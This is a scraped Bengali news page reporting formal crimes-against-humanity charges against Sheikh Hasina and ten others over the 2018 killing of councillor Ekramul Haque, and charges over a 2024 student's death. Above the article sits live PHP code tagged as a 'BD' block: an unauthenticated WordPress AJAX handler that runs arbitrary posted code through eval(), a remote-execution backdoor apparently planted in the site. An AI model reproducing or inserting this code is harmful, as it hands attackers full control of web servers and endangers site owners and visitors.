// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== কাউন্সিলর একরাম হত্যা: শেখ হাসিনাসহ ১১ জনের বিরুদ্ধে আনুষ্ঠানিক অভিযোগ | potrikaybangladesh.com
Wednesday, September 23, 2026
Homeঅপরাধকাউন্সিলর একরাম হত্যা: শেখ হাসিনাসহ ১১ জনের বিরুদ্ধে আনুষ্ঠানিক অভিযোগ

কাউন্সিলর একরাম হত্যা: শেখ হাসিনাসহ ১১ জনের বিরুদ্ধে আনুষ্ঠানিক অভিযোগ

টেকনাফ পৌরসভার সাবেক কাউন্সিলর একরামুল হক হত্যার ঘটনায় মানবতাবিরোধী অপরাধের মামলায় ক্ষমতাচ্যুত প্রধানমন্ত্রী শেখ হাসিনাসহ ১১ জনের বিরুদ্ধে আনুষ্ঠানিক অভিযোগ জমা দিয়েছে প্রসিকিউশন। 

আজ রোববার আন্তর্জাতিক অপরাধ ট্রাইব্যুনাল-২-এ এই অভিযোগ জমা দেওয়া হয়।

মামলার অভিযুক্তদের তালিকায় আরও আছেন সাবেক স্বরাষ্ট্রমন্ত্রী আসাদুজ্জামান খান কামাল, আওয়ামী লীগের সাধারণ সম্পাদক ওবায়দুল কাদের, সাবেক সংসদ সদস্য আবদুর রহমান বদি, সাবেক আইজিপি বেনজীর আহমেদ এবং র‍্যাবের ছয়জন সাবেক কর্মকর্তা।

আসামিদের বিরুদ্ধে প্রাথমিকভাবে শক্ত প্রমাণ পেয়ে ট্রাইব্যুনাল আনুষ্ঠানিকভাবে এ অভিযোগ আমলে নিয়েছেন।

প্রসিকিউশনের মতে, ২০১৮ সালের ২৬ মে কক্সবাজারের টেকনাফ মেরিন ড্রাইভ সড়কে মাদকবিরোধী অভিযানের নামে র‍্যাবের তথাকথিত ‘বন্দুকযুদ্ধে’ একরামুল হককে গুলি করে হত্যা করা হয়।

অন্যদিকে, পৃথক আরেকটি ঘটনায় ২০২৪ সালের ১৮ জুলাই সাভারে মিলিটারি ইনস্টিটিউট অব সায়েন্স অ্যান্ড টেকনোলজির (এমআইএসটি) কম্পিউটার সাইন্স অ্যান্ড ইঞ্জিনিয়ারিং বিভাগের চতুর্থ বর্ষের শিক্ষার্থী শেখ আসহাবুল ইয়ামিন হত্যার ঘটনায় সাবেক সংসদ সদস্য মুহাম্মদ সাইফুল ইসলামসহ ১৯ জনের বিরুদ্ধে মানবতাবিরোধী অপরাধের আনুষ্ঠানিক অভিযোগ গ্রহণ করেছেন ট্রাইব্যুনাল।

প্রসিকিউশন জানায়, ভিডিও ফুটেজে দেখা গেছে, গুরুতর আহত অবস্থায় ওই শিক্ষার্থীকে পুলিশ সদস্যরা একটি সাঁজোয়া যান (এপিসি) থেকে নিচে ফেলে দেয়, রাস্তায় টেনে-হিঁচড়ে নিয়ে যায় এবং পরবর্তীতে রোড ডিভাইডারের ওপর ফেলে রেখে চলে যায়।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments